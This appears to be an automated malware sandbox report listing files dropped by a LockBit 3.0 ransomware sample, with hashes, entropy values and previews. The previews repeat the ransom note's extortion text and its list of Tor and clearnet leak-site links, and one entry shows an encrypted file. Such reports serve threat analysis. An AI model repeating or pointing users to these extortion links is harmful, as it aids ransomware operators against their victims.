                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.980223900269048
                Encrypted:false
                SSDEEP:192:dpXc+lIOrM3yQzH4Crd5aRBzQ5/VMnMareMLNcyZ/9FrdI0RWHtsB+meYupr7o:dpXZl/K4Crdw9Q5/VE7FrrRitsB+mUrM
                MD5:5DD6125FED69E29498011ED8DD001AE8
                SHA1:EB99E32EB217990DD5B6621BAEDD761447FCBACD
                SHA-256:D68F6F5799042FD637F85B52AD39052A7959551FD4E05332BEA3BEAB462C8702
                SHA-512:BF11E49ACDDBB914BE8FA7FF3686D8C93158D382F9A8B2A8FCB31A43ED023BD323E36EDE12096C6F97D5F0E767EB33AEED2AC219D3EF8C501ED2721220A7276D
                Malicious:false
                Preview:#..D.1.:vG..S..].X6a....-.<...^^.?._.qJ...............`y.a.>..G....H...&w..t|%...`...eU,.....#.b..:..`RX......Y.......v..Y/..A../Vc..o./c'b.:...OYZ'..!!..H..[...8q.........P=...h..C>+.2...XJ.L.;. ...*.'.<j..B.X..eq+=~..=......=.w......._.....b..c...aD..j.E..,mY.P..?..ro8t...6.!.....A....N.q+.6-z.+)..5Q.0..1j.....*.!vr.x%.#...1.W.E...i...b....x..c.4.......wK....vH.....w.r.-1k..TP...7..XBx7...5A..]b..~...5~.o2.... ....e......A.%.jX..{..H...aP.....q.'.WN...!.D.k..nf"@.).El.....l...C..K.>.Q.>.ih..:.=[.1.....4=.\.=y,.X.....9......L..tX.sDr8.4I...F(B.*....!8.....`<.H.~./K...WM..........3J..%.>...N.*....BAA..{.+S..w...I.'%2.=%.C=...t...!...yW.zv.3...^..n?..aL+.O.S,k..U..V..}.i.'..W.c.g...pg..&.#)..z.t=...P0.N[.e.,.....o....}w.m.....6f.p(lN.\...g....p`.[..{.H....s.U..tXM.Y..p..u.Qh.(.......E..........<......t\.4o..2....Y.uC8..FDy%f.^.D..Z~;Qx.....pM%.....V...T.+..@..8...B....fg..\..K....6.]x."5.s.........,J|....*..9..g=f.....I.@....}..6'..@.8O

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
